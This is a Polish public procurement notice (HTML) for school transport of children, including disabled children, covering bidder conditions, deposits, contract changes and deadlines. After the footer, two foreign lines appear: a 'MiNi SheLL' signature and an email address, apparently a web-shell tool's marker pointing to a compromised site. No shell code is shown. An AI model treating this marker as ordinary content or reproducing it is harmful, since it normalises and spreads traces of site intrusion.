kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas podstawienia w przypadku wystąpienia awarii pojazdu zastępczego spełniającego warunki określone w SWZ</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu określone w ogłoszeniu zgodnie z art. 112 ust. 2 ustawy Pzp, dotyczące:<br/> zdolności technicznej lub zawodowej.<br/> Ocena zdolności wykonawcy do należytego wykonania zamówienia<br/> 2. W celu potwierdzenia spełnienia przez wykonawcę warunków udziału w postępowaniu dotyczących kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej - zamawiający wyraża jako minimalne poziomy:<br/> ZADANIE 1-3:<br/> 1) posiadanie aktualnego zezwolenia lub licencji na wykonywanie krajowego transportu drogowego w zakresie przewozu osób wydanego na podstawie ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2021r., poz. 919 z późn. zm.) lub odpowiadające mu zezwolenia, które zostało wydane na podstawie wcześniej obowiązujących przepisów.<br/> 3. W celu potwierdzenia spełnienia przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej - zamawiający wyraża jako minimalne poziomy:<br/> ZADANIE 1-2:<br/> 1) dysponowanie do realizacji zamówienia min. jednym kierowcą posiadającym uprawnienia do prowadzenia pojazdów samochodowych o dopuszczonej masie całkowitej do 3,5 t tj. prawo jazdy kat. B zgodnie z ustawą z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym ( Dz.U. z 2021 r., poz. 450 z późn. zm.) oraz Ustawą z dnia 6 września 2001 r. o transporcie drogowym (Dz.U. z 2021 r., poz. 919 z późn. zm.)<br/> 2) dysponowanie do realizacji zamówienia min. jednym opiekunem posiadającym ukończony kurs z zakresu BHP oraz pierwszej pomocy przedmedycznej.<br/> Wszystkie osoby biorące udział w realizacji zamówienia nie mogą być karane za przestępstwa na tle seksualnym.<br/> 3) dysponowanie min. jednym pojazdem, przystosowanym do przewozu osób niepełnosprawnych oraz posiadającym ważne badania techniczne, ubezpieczenie OC i NNW<br/> ZADANIE 3:<br/> 4) dysponowanie do realizacji zamówienia min. jednym kierowcą posiadającym uprawnienia do prowadzenia pojazdów samochodowych o dopuszczonej masie całkowitej do 3,5 t tj. prawo jazdy kat. B zgodnie z ustawą z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym ( Dz.U. z 2021 r., poz. 450 z późn. zm.) oraz Ustawą z dnia 6 września 2001 r. o transporcie drogowym (Dz.U. z 2021 r., poz. 919 z późn. zm.)<br/> 5) dysponowanie do realizacji zamówienia min. jednym opiekunem posiadającym ukończony kurs z zakresu BHP oraz pierwszej pomocy przedmedycznej.<br/> Wszystkie osoby biorące udział w realizacji zamówienia nie mogą być karane za przestępstwa na tle seksualnym.<br/> 6) dysponowanie min. jednym pojazdem, przystosowanym do przewozu osób niepełnosprawnych dla trojga dzieci, w tym posiadającym odpowiedni do przewozu 7-letniego dziecka z padaczką 1 fotelik samochodowy z pasami, oraz posiadającym odpowiedni do przewozu 5-letniego dziecka 1 fotelik samochodowy z pasami, ważne badania techniczne oraz ważne ubezpieczenie OC i NNW.<br/> Zamawiający wymaga sumowania potencjału technicznego dla wykonawców<br/> składających ofertę na więcej niż jedno zadanie. Oznacza to, że wykonawca nie może<br/> posłużyć się tą samą zdolnością techniczną dla Zadania 1, Zadania 2 i Zadania 3.<br/> 4. Oceniając zdolność techniczną lub zawodową, zamawiający może, na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Dla udokumentowania spełnienia wymaganych warunków udziału w postępowaniu przez wykonawcę oraz braku podstaw do wykluczenia, o którym mowa w art. 57 ust. 1 ustawy Prawo zamówień publicznych, zamawiający żąda złożenia wraz z ofertą aktualnych na dzień składania ofert: <br/> 1) oświadczenia wykonawcy składanego na podstawie art. 125 ust. 1 ustawy Pzp, dotyczącego spełniania warunków udziału oraz braku podstaw wykluczenia w postępowaniu, zgodnie z załącznikiem nr 2 do SWZ– dokument w formie elektronicznej (opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym;<br/> Uwaga<br/> I. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o którym mowa w pkt 1 składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.<br/> 2) Wykonawca, w przypadku polegania na zdolnościach podmiotów udostępniających zasoby, przedstawia, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby – zgodnie z załącznikiem nr 3 do SWZ - dokument w formie elektronicznej (opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym podmiotu udostępniającego zasoby.<br/> 2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy - załącznik nr 5 do SWZ - dokument w postaci elektronicznej lub poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej opatrzony kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/> 3. W celu oceny, czy wykonawca polegając na zdolnościach innych podmiotów na zasadach określonych w art. 118 ust. 1 ustawy Pzp, będzie dysponował niezbędnymi zasobami na potrzeby realizacji danego zamówienia w stopniu umożliwiającym należyte wykonanie oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, wykonawca składa wraz z ofertą,<br/> zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia (zgodnie z załącznikiem nr 4 do SWZ pn. „Wzór zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia” – dokument w postaci elektronicznej lub poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej opatrzony kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym tego podmiotu – lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/> Treść dokumentu powinna określać w szczególności:<br/> – zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/> – sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia;<br/> – czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">4. Wykaz dokumentów i oświadczeń które wykonawca składa w postępowaniu na wezwanie zamawiającego (art. 274 ust. 1 ustawy Pzp.) w celu potwierdzenia okoliczności, o których mowa w art. 57 pkt 2 ustawy Pzp (dot. spełnienia warunków udziału w postępowaniu) - aktualnych na dzień ich złożenia:<br/> 1) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – wypełniony załącznik nr 6 do SWZ - dokument w postaci elektronicznej lub poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej opatrzony kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym;<br/> 2) aktualne zezwolenie lub licencja na wykonywanie krajowego transportu drogowego w zakresie przewozu osób wydanego na podstawie ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2021r., poz. 919 z późn. zm.) lub odpowiadające mu zezwolenia, które zostały wydane na podstawie wcześniej obowiązujących przepisów – kopia dokumentu poświadczona za zgodność z oryginałem przez wykonawcę<br/> 3) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; - załącznik nr 7.1 dla Zadania 1, załącznik nr 7.2 dla Zadania 2, załącznik nr 7.3 dla Zadania 3 - dokument w postaci elektronicznej lub poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej opatrzony kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym;<br/> 4) wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami - załącznik nr 8.1 dla Zadania 1, załącznik nr 8.2 dla Zadania 2, załącznik nr 8.3 dla Zadania 3 do SWZ - dokument w postaci elektronicznej lub poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej opatrzony kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 4. Wykonawca zobowiązany jest składając ofertę załączyć do niej na platformie zakupowej następujące oświadczenie i dokumenty:<br/> 1) formularz oferty (załącznik nr 1.1 do SWZ dla Zadania 1);<br/> 2) formularz oferty (załącznik nr 1.2 do SWZ dla Zadania 2);<br/> 3) formularz oferty (załącznik nr 1.3 do SWZ dla Zadania 3);<br/> 4) oświadczenie wykonawcy składane na podstawie art. 125 ust. 1 ustawy Pzp, dotyczące<br/> spełniania warunków udziału w postępowaniu oraz braku podstaw wykluczenia z postępowania<br/> (załącznik nr 2 do SWZ dla Zadania 1-3);<br/> 5) oświadczenie podmiotu na którego zasoby wykonawca się powołuje dotyczące spełniania<br/> warunków udziału w postępowaniu oraz braku podstaw wykluczenia z postępowania składane<br/> na podstawie art. 125 ust. 1 ustawy Pzp, dotyczące przesłanek wykluczenia z postępowania<br/> (załącznik nr 3 do SWZ dla Zadania 1-3) – jeżeli dotyczy,<br/> 6) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia (załącznik nr 4 do SWZ dla Zadania 1-3) / jeśli dotyczy,<br/> 7) oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia składane na podstawie art. 117 ust. 4 ustawy Pzp dotyczące usług, które wykonają poszczególni Wykonawcy (załącznik nr 5 do SWZ dla Zadania 1-3) / jeśli dotyczy,<br/> 8) pełnomocnictwo lub inny dokument określający zakres umocowania do reprezentowania wykonawcy, treść pełnomocnictwa musi jednoznacznie określać czynności, co do wykonywania których pełnomocnik jest upoważniony, o ile ofertę składa pełnomocnik lub przedstawiciel wykonawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający żąda od wykonawców wniesienia wadium w kwocie: <br/> Zadanie 1: w kwocie: 1.400,00 zł (słownie: tysiąc czterysta złotych i 00/100)<br/> Zadanie 2: w kwocie: 1.700,00 zł (słownie: tysiąc siedemset złotych i 00/100)<br/> Zadanie 3: w kwocie: 2.100,00 zł (słownie: dwa tysiące sto złotych i 00/100) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 15. Zamawiający nie określa szczególnego sposobu spełniania przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunków udziału w postępowaniu, o których mowa w ust. 2-3.<br/> 16. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/> 17. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy - załącznik nr 5 do SWZ - dokument w postaci elektronicznej lub poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej opatrzony kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/> 18. Zamawiający określa wymagania związane z realizacją zamówienia przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, w sposób określony w ust. 16.<br/> <br/> 7. Wykonawcy ubiegający się wspólnie o zamówienie:<br/> 1) w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenia składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnienie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnienie warunków udziału w postępowaniu oraz brak podstaw wykluczenia;<br/> 2) wykonawcy wspólnie ubiegający się o udzielenie zamówienie ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;<br/> 3) pełnomocnictwo, o którym mowa w pkt 2 musi znajdować się w ofercie wspólnej wykonawców; pełnomocnictwo musi być złożone w ofercie w postaci elektronicznej lub poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej opatrzony kwalifikowanym podpisem elektronicznym, podpisem zaufanym, podpisem osobistym. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, może dokonać również notariusz;<br/> 4) udzielone pełnomocnictwo musi upoważniać do działania w imieniu wykonawcy a treść pełnomocnictwa musi jednoznacznie określać czynności, co do wykonywania których pełnomocnik jest upoważniony w przypadku, gdy jest to osoba upoważniona do reprezentowania wykonawcy zgodnie z wymogami obowiązującego prawa;<br/> 5) pełnomocnik pozostaje w kontakcie z zamawiającym w toku postępowania i do niego zamawiający kieruje informacje, korespondencję, itp.;<br/> 6) oferta wspólna, składana przez dwóch lub więcej wykonawców, powinna spełniać następujące wymagania:<br/> a) oferta wspólna powinna być sporządzona zgodnie z SWZ;<br/> b) sposób składania dokumentów w ofercie wspólnej:<br/> c) dokumenty, dotyczące własnej firmy, takie jak np.: dokumenty i oświadczenia wymienione w § 11 ust. 1 pkt 1, ust. 4 pkt 1 – składa każdy z wykonawców składających ofertę wspólną we własnym imieniu;<br/> d) dokumenty wspólne takie jak: formularz oferty; dokumenty i oświadczenia wymienione w § 11 ust. 1 pkt 2, ust. 2-3, ust. 4 pkt 2-4 SWZ - składa pełnomocnik wykonawców w imieniu wszystkich wykonawców składających ofertę wspólną, bądź wykonawcy wspólnie w imieniu każdego z wykonawców,<br/> 7) wspólnicy spółki cywilnej są traktowani jak wykonawcy składający ofertę wspólną i mają do nich zastosowanie zasady określone w pkt 1-6;<br/> 8) jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, została wybrana, zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. ZAMAWIAJĄCY zastrzega sobie możliwość zmian post. umowy w zakresie przedmiotu zamówienia bez potrzeby sporządzania aneksu:1) w odniesieniu do szkół i placówek, do których uczęszczają dzieci (doty. zmiany szkoły/ placówki w trakcie roku szko.)2) w przypadku rezygnacji z dowozu, zastąpienie jednego dziecka innym dzieckiem, którego podanie wpłynęło w trakcie realizacji zam., bez względu na adres zamiesz. i adres placówki do której dziecko będzie dowożone;3) w odniesieniu do adresu zam. dzieci (dotyczy zmiany adresu zam.<br/>w trakcie roku szk.); 4) w odniesieniu do liczby dzieci dowożonych tj. zwiększenia maks.<br/>o 2-ch w stosunku do liczby dzieci wymienionych w zał nr 1 do umowy;2. Ponadto dopuszcza się następujące zmiany warunków umowy:dopuszcza się zmianę wynagr. brutto w przypadku zmiany stawek podat., wprowadzonych stos. przepisami prawa powszechnie obow., wynagrodzenie netto pozostanie bez zmian,zamawiający dopuszcza zmianę osób odpowiedzialnych za wykonanie zamówienia, pod warunkiem posiadania przez nowe osoby wymaganych przez Zamawiającego kwalifikacji.<br/>3. Zamawiający na podstawie art. 144 ust. 1 ustawy Pzp, przewiduje możliwość zmiany zawartej umowy w następujących sytuacjach:<br/> 1) zmiany dotyczą realizacji dodatkowych usług nieobjętych zamówieniem pods., o ile stały się niezbędne i zostały spełnione łącznie następujące warunki:zmiana wykonawcy nie może zostać dokonana z powodów ekon.lub technicznych, w szczególności dotyczących zamienności zamówionych w ramach zamówienia pods.; zmiana wykonawcy spowodowałaby istotną niedogodność lub znaczne zwiększenie kosztów dla zamawiającego;wartość każdej kolejnej zmiany nie przekracza 50% wartości zam. określonej pierwotnie w umowie lub umowie ramowej;<br/> 2) zostały spełnione łącznie następujące warunki:konieczność zmiany umowy lub umowy ramowej spowodowana jest okolicznościami, których zamawiający, działając z należytą starannością, nie mógł przewidzieć; wartość zmiany nie przekracza 50% wartości zamówienia określonej pierwotnie w umowie lub umowie ramowej;<br/>3) wykonawcę, któremu zama. udzielił zamówienia, ma zastąpić nowy wykonawca:<br/> a) na podstawie postanowień umownych, o których mowa w pkt 1;<br/> b) w wyniku połączenia, podziału, przekształcenia, upadłości, restrukturyzacji<br/>lub nabycia dotychczasowego wykonawcy lub jego przedsiębiorstwa, o ile nowy wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy;<br/>c) w wyniku przejęcia przez zamawiającego zobowiązań wykonawcy względem jego podwykonawców;<br/>4) zmiany, niezależnie od ich wartości, nie są istotne; za niedopuszczalne i istotne zmiany umowy Zamawiający uważa:<br/>a) zmianę ogólnego charakteru umowy, w stosunku do charakteru umowy<br/>w pierwotnym brzmieniu; <br/>b) zmianę która nie zmienia ogólnego charakteru umowy i zachodzi co najmniej jedna z następujących okoliczności:<br/>- zmiana wprowadza warunki, które, gdyby były postawione w postępowaniu<br/>o udzielenie zamówienia, to w tym postępowaniu wzięliby lub mogliby wziąć udział inni wykonawcy lub przyjęto by oferty innej treści,<br/>- zmiana narusza równowagę ekonomiczną umowy lub umowy ramowej na korzyść wykonawcy w sposób nieprzewidziany pierwotnie w umowie lub umowie ramowej,<br/>- zmiana znacznie rozszerza lub zmniejsza zakres świadczeń i zobowiązań wynikającyz umowy lub umowy ramowej,polega na zastąpieniu wykonawcy, któremu zamawiający udzielił zam., nowym wyk., w przypadkach innych niż wymienione w ust. 2 pkt 3 umowy,<br/>4. Zmiany, o których mowa w ust. 2 pkt 2 i 3 i ust.3 nie mogą prowadzić do zmiany charakteru umowy.5. Postanowienia umowne zmienione z narusz. ust. 2-3 podlegają unieważnieniu.Na miejsce unieważnionych postanowień umowy wchodzą postanowienia umowne w pierwotnym brzmieniu.6. Strony umowy niezwłocznie wzajemnie informują się o wpływie okolicz.związanych z wystąp. COVID - 19 lub innego stanu zagroż. ogólnokrajowego na należyte wyko. tej umowy, o ile taki wpływ wystąpił lub może wystąpić. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-05 12:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/legionowo</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-05 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-03</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-28 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com